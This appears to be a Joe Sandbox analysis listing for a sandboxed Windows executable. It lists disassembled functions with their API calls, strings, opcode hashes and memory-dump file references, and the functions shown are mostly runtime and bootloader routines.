Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: 2a7b28c8b8fe390e5f37d72770fe89c93e9a5191be55e77e847426bb886f5d33
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 3D215E61A0C64243EB10AF56F49563AE7B1FFC5FB0F900235EAAD43AE4DE6CD4468B50

Function 00007FF7C71B90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71B8760: GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
Part of subcall function 00007FF7C71B8760: OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
Part of subcall function 00007FF7C71B8760: GetTokenInformation.KERNELBASE ref: 00007FF7C71B87B8
Part of subcall function 00007FF7C71B8760: GetLastError.KERNEL32 ref: 00007FF7C71B87C2
Part of subcall function 00007FF7C71B8760: GetTokenInformation.KERNELBASE ref: 00007FF7C71B8802
Part of subcall function 00007FF7C71B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
Part of subcall function 00007FF7C71B8760: CloseHandle.KERNEL32 ref: 00007FF7C71B8836

LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B916C
LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B9175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF7C71B9157
S-1-3-4, xrefs: 00007FF7C71B9121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7C71B9183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7C71B9142

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 7d25f7ac8a3c166c1bdede6ca0dbec049a34941688e647fd4765907fde19d170
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 3C218C61A0864287E610BF10F4552EAA261EFC8BA0FC44032EE4D43786DF3CD90687A0

Function 00007FF7C71CCFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD177

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: a26d259292c1d742ca6ba35c1b661ed6d895888781958de7865a86e3ed6bf798
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 8091D872F2866197F750AFB5A44127DABA0BB84FA8F944139DE4E57A84CE38D443C720

Function 00007FF7C71C5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C56C5
CreateFileW.KERNELBASE ref: 00007FF7C71C5704
CloseHandle.KERNEL32 ref: 00007FF7C71C5739

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 3fa3712730203a21713272f923b36b88b47f3eb768463d7f2c27089bf2514277
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: E541C822D1878183E310AF61A551379B760FBD4BB4F908334EA5C03AD1DF7CA5E28760

Function 00007FF7C71BCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71BCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7C71BCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7C71BCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF7C71BCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7C71BCD91

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: b51fe4a4f4d6e6491221dbb5985eeacbca90a5ed64967321097aa08276f2f87e
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: EF314BA5E0824743FA64BF64B4623B99A919FC5FA4FC44434DD4E4B2D3DE2CE50786B0

Function 00007FF7C71C9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7C71C9A9C), ref: 00007FF7C71C9AB1
TerminateProcess.KERNEL32(?,?,?,00007FF7C71C9A9C), ref: 00007FF7C71C9ABC
ExitProcess.KERNEL32 ref: 00007FF7C71C9ACB

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: afc438902a9f3ef73e9e008cfa43491e2e0976f11f3fd3ce2b717cb854b39b2c
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 3ED06714B0864653EA293FB078D907896526FD8F61B981438C84B06393DD6DE54A4720

Function 00007FF7C71C01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C02E7

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 38bd95e9f4edfaad8ff504e530bdb76222f489bed8d80ab98bd67998b975b0b8
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: D851D421B092414FE624AEA6A90067EE691BBC4FB4F945734DE6D477C5CE3CD4028620

Function 00007FF7C71CC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7C71CC33D), ref: 00007FF7C71CC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7C71CC33D), ref: 00007FF7C71CC1FA

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 45cd257ebe968dedf8a9017d63e518e87f626e9994ae5da0e6065c9b46ba4dc3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 7611C461A18A4182DA20AF6AB844169A361BB85FF4F944335EE7D4B7D9CE7CD4528700

Function 00007FF7C71CA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: bb80073ab4e34203d482b92d8b1f0b610e16cf64405409afa22fc5c342af9738
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: D1E04F10E0820253FF167FF2788613896A06FD4F60F854034C91D822A1DE2C69878620

Function 00007FF7C71CABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC36
GetLastError.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC40

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: fcb1af7905ca4188874b991a65e92d67468ddf644b753bcdf3443fa653a7e908
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: EE216211B2C64243EAA57FA5B49527D92D2AFC4FF0F884235DA2E477C1DE6CA4878324

Function 00007FF7C71CBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBF44

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 205d2de5721195348593361f256ffe3bf771015d63912b837573ae568e498404
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 3741D732A0820187FA34AF99B541279F3A4EB95FA0F940131DB8E87791CF2DE503CB61

Function 00007FF7C71B7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7C71B802A

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 3444aa7209edb3b7be450d659aa5a443e70ab9b7aff340a2814dff51627c4016
Instruction ID: fac5da0a37711a33efb0f7be2c34fcc64e4431d87ee4fa977ff3b5c943acd697
Opcode Fuzzy Hash: 3444aa7209edb3b7be450d659aa5a443e70ab9b7aff340a2814dff51627c4016
Instruction Fuzzy Hash: CB217E61B1865287EB14BE6379043BAD691BF85FE8FC85430EE4D0B786CE7DE0428660

Function 00007FF7C71CB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBA32

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: fdfc1001f932569fa1f7ad15dc0e1ab766aca97bd891d72e38dd49d6acebaed0
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 0F318F21A1864287E7627FD5A84137CAA50ABC0FB4FC50135EA6D833D2CE7CE5438730

Function 00007FF7C71C99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C71C99FF

Part of subcall function 00007FF7C71C9AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF7C71C9B1D
Part of subcall function 00007FF7C71C9AF8: GetProcAddress.KERNEL32 ref: 00007FF7C71C9B33
Part of subcall function 00007FF7C71C9AF8: FreeLibrary.KERNEL32 ref: 00007FF7C71C9B5A

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 0a4e7d4745b2d85396fb4c1e03c75a07d4516985b98d4862219aefe3b6e96ccb
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 84218332A047858BEB25AFA4D4442EC77A0FB84F28F881635D65E06AD5DF38D546CB60

Function 00007FF7C71C6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C5F69

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 91115e2fd1bbbc9c0d303a93905b340650122a0185ad83e0113169f1e32c1d17
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 05116322A1C64183EA65BF91B40117EEAA8BFC5FA4FE44031EB4C57B96DF7DD4428720

Function 00007FF7C71D63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D63E7

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 4729124711d76494614b91328dfee41258d6470ea0af0efbe755ef49afc87248
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 2721837261864187DB62AF18E480379B6A0EBE4FB4F944234EA9D876D5DF7CD4028F10

Function 00007FF7C71C042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C0480

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: f6c624080fd01c9890cb2498434e2ff58dc09a8d64f37a1bf1b7886543d957e0
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: CF01C431A0874146EA04FF96AD0106AE695BFD5FF0F984631EE6C5BBD6DE3CE5028310

Function 00007FF7C71C7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C7FAA

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: fe10343f198e6734e4790a2f5ffa73b57373fd4c0698af970ccc4210dbe12608
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: F2016D20A0D29242FA607EB67581179D198BFC4FF0FD84535EA6D42AC6DFACE4438231

Function 00007FF7C71C82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

